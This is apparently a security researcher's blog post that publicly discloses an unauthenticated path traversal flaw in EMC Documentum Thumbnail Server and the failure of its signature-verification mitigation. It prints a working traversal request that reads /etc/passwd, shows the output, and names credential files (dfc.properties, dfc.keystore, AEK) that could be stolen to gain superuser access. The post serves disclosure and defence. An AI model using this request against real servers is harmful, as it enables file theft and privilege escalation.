Beware of Thumbnail Server

This issue was originally filed to EMC on February 8, since I haven’t received any feedback I suppose that issue is insignificant and unimportant, so it comes to public.

Previously I already wrote that in xCP 2 EMC brought together all non-popular products in Documentum product stack (like xPlore, CTS, BAM, BPS, CIS and thumbnail server) and made those products mandatory for xCP 2 deployment. For example, below is a quote from xCP deployment guide:

Unfortunately, in most cases “non-popular” means “more buggy” and “less secure” (what do you think about inclusion such products into product stack? Is it a best practice on not?), and Thumbnail Server proves this opinion. Thumbnail Server accepts only two types of URL:

  • /thumbsrv/getThumbnail?format=msw8&object_type=dm_document&is_vdm=false – retrieves default document’s thumbnail
  • /thumbsrv/getThumbnail?path=00038444\80002.jpg&store=thumbnail_store_01&ticket=oiwDnVjAh… – retrieves real document’s thumbnail

in case of second option Thumbnail Server fails to verify path parameter:

[root@docu70dev01 ~]# GET http://192.168.2.56:8081/thumbsrv/getThumbnail?store=thumbnail_store_01\&path=0001ffd7/../../../../../../../etc/passwd \
> | head
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
[root@docu70dev01 ~]#

i.e. unauthenticated user is able to hijack arbitrary file (dfc.properties with bof registry credentials, dfc.keystore with enabled trusted login capability, AEK file, etc) from Content Server filesystem and hence gain superuser privileges.

To mitigate attack described previously Thumbnail Server has an option to verify digital signature of passed url parameters (in Installation Guide this feature described in “Providing security for thumbnail requests” paragraph, note that documentation is bit outdated). Unfortunately enabling signature verification does not work properly in recent releases because of the following length requirements: full url must not exceed 300 characters and about 200 characters are required for ticket parameter, which makes described feature unusable: documentation doesn’t forces customers to enable signature verification, but enabling it causes errors in case of long (<10 characters) FQDNs, so, it's very unlikely that customers unable this feature:

Connected to Documentum Server running Release 7.0.0140.0644  Linux.Oracle
Session id is s0
API> retrieve,c,dm_store where name='thumbnail_store_01'
...
2801ffd780000101
API> ?,c,select parent_id from dmr_content where storage_id='2801ffd780000101' enable(return_top 10)
parent_id
----------------
...
0901ffd7800ba6d1
..
(10 rows affected)
    
API> ?,c,select thumbnail_url from dm_sysobject(all) where r_object_id='0901ffd7800ba6d1'
thumbnail_url
--------------
http://localhost.localdomain:8081/thumbsrv/getThumbnail?path=....
(1 row affected)
[DM_OBJECT_W_SET_ATTR_STRING_TOO_LONG]warning:  "attempt to assign string of excessive length to attribute 0"
API> exit
Bye
 ~]$ HEAD "http://localhost.localdomain:8081/thumbsrv/getThumbnail?path=0001ffd7/80/00/02/01.jpg&store=thumbnail_store_01&ticket=Nk%2F5pSJtlTp3FlL9V8Og6tExs4cYpNJyG2fy1BEnIGJMPfTP%2FH5aMfIgXKUXNiLa0pJp6t%2FPCHd%2Fi%2F%2BDJpdA0jAkmtB9j%2FdBrBFVr6DlK%2B2EpDVXNRTCLkwsIQ%2B0wTW%2BKda7VhuZwU%2BdXJ4DfGNJ5voziUHB0%2B"
400 Bad Request
Connection: close
Date: Sat, 07 Feb 2015 17:33:06 GMT
Server: Apache-Coyote/1.1
Content-Length: 971
Content-Type: text/html;charset=utf-8
Client-Date: Sat, 07 Feb 2015 17:33:06 GMT
Client-Peer: 127.0.0.1:8081
Client-Response-Num: 1

Related error from Thumbnail Server log files:

SEVERE: getThumbnail: : [DM_TS_E_DECRYPT_TICKET] Exception occured while decrypting ticket 'Nk/5pSJtlTp3FlL9V8Og6tExs4cYpNJyG2fy1BEnIGJMPfTP/H5aMfIgXKUXNiLa0pJp6t/PCHd/i/+DJpdA0jAkmtB9j/dBrBFVr6DlK+2EpDVXNRTCLkwsIQ+0wTW+Kda7VhuZwU+dXJ4DfGNJ5voziUHB0+': null
java.lang.NullPointerException
  at com.rsa.jcm.f.eo.verify(Unknown Source)
  at com.rsa.cryptoj.o.k.engineVerify(Unknown Source)
  at java.security.Signature.verify(Signature.java:592)
  at com.documentum.thumbsrv.getThumbnail.isTicketValid(getThumbnail.java:626)
  at com.documentum.thumbsrv.getThumbnail.doGet(getThumbnail.java:319)
...

The root cause of above error is a fact that when Content Server returns value of thumbnail_url it cuts off value up to 300 characters (?bytes, note DM_OBJECT_W_SET_ATTR_STRING_TOO_LONG warning message in listing). The valid value of ticket parameter in this case should be (200 characters):

 ~]$ HEAD "http://localhost.localdomain:8081/thumbsrv/getThumbnail?path=0001ffd7/80/00/02/01.jpg&store=thumbnail_store_01&ticket=Nk%2F5pSJtlTp3FlL9V8Og6tExs4cYpNJyG2fy1BEnIGJMPfTP%2FH5aMfIgXKUXNiLa0pJp6t%2FPCHd%2Fi%2F%2BDJpdA0jAkmtB9j%2FdBrBFVr6DlK%2B2EpDVXNRTCLkwsIQ%2B0wTW%2BKda7VhuZwU%2BdXJ4DfGNJ5voziUHB0%2B%2BFaGUoY9I0NEA%3D"
200 OK
Connection: close
Date: Sat, 07 Feb 2015 17:43:53 GMT
ETag: 0001ffd7/80/00/02/01.jpg
Server: Apache-Coyote/1.1
Content-Length: 3565
Content-Type: image/jpeg
Client-Date: Sat, 07 Feb 2015 17:43:53 GMT
Client-Peer: 127.0.0.1:8081
Client-Response-Num: 1

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s